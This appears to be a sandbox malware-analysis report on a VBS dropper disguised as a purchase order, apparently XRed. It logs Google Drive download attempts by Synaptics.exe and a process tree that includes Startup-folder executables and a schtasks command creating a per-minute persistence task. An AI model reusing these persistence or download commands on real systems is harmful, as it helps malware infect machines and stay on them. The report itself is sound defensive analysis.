                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:09:02 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:09:01 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-y2vDU8jim8pqKgN_dw2ztA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 50143 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:09:01 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:09:02 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC7Rk2pdi18vxEe0YfmVS3C9l96fONp5K9IwkWu-PRmFYhA_8wmelTCadjo72y0EEIjM
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:09:01 GMT
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-2orpwxhy03kheJwZTXAD2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:09:02 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-25 08:09:02 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="gAlzxn_oD2DTM2nsxZ-Xgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-25 08:09:02 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 50146 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:09:01 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:09:02 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:09:01 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-zKxQKyOuV1tVfdR7cyf65A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 50144 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:09:01 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:09:02 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4qsokhAxUkHlHRW54fOnLCDU9cH1M5IvcQmpLO5t9vIGR21KNIfccPZeEOOBwmJ3Y3
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:09:02 GMT
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Agg0YvNVdaWnwZtvlcVOnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-12-25 08:09:02 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                2024-12-25 08:09:02 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 37 4d 49 6d 52 44 59 47 72 6a 59 73 41 6d 57 39 42 30 57 49 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="q7MImRDYGrjYsAmW9B0WIw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                2024-12-25 08:09:02 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>



                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:03:06:55
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs"
                                                                                                                                                                Imagebase:0x7ff6fc7c0000
                                                                                                                                                                File size:170'496 bytes
                                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1762602570.0000022996705000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1762528484.0000022996FF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1761225232.00000229974E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1761289486.0000022996F9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1760645672.00000229972F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:1
                                                                                                                                                                Start time:03:07:03
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'688'576 bytes
                                                                                                                                                                MD5 hash:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000000.1761821039.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:3
                                                                                                                                                                Start time:03:07:13
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'688'576 bytes
                                                                                                                                                                MD5 hash:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:03:07:14
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'688'576 bytes
                                                                                                                                                                MD5 hash:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:7
                                                                                                                                                                Start time:03:07:14
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                                                                                                                                                Imagebase:0x1e0000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 53%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:8
                                                                                                                                                                Start time:03:07:15
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:771'584 bytes
                                                                                                                                                                MD5 hash:1D45B99034D67448EBF0776BD5699C84
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:9
                                                                                                                                                                Start time:03:07:15
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                Imagebase:0xdb0000
                                                                                                                                                                File size:53'161'064 bytes
                                                                                                                                                                MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:10
                                                                                                                                                                Start time:03:07:16
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:11
                                                                                                                                                                Start time:03:07:16
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff72bec0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:12
                                                                                                                                                                Start time:03:07:16
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:147'456 bytes
                                                                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000C.00000002.2962021382.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000C.00000002.2962613368.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000C.00000002.2962021382.0000000002AFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:13
                                                                                                                                                                Start time:03:07:16
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                                                                                                                                                Imagebase:0x190000
                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:16
                                                                                                                                                                Start time:03:07:18
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 53%, ReversingLabs
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:19
                                                                                                                                                                Start time:03:07:27
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:20
                                                                                                                                                                Start time:03:07:35
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:771'584 bytes
                                                                                                                                                                MD5 hash:1D45B99034D67448EBF0776BD5699C84
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:21
                                                                                                                                                                Start time:03:07:43
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:22
                                                                                                                                                                Start time:03:07:51
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                                                                                                                                                Imagebase:0x1e0000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
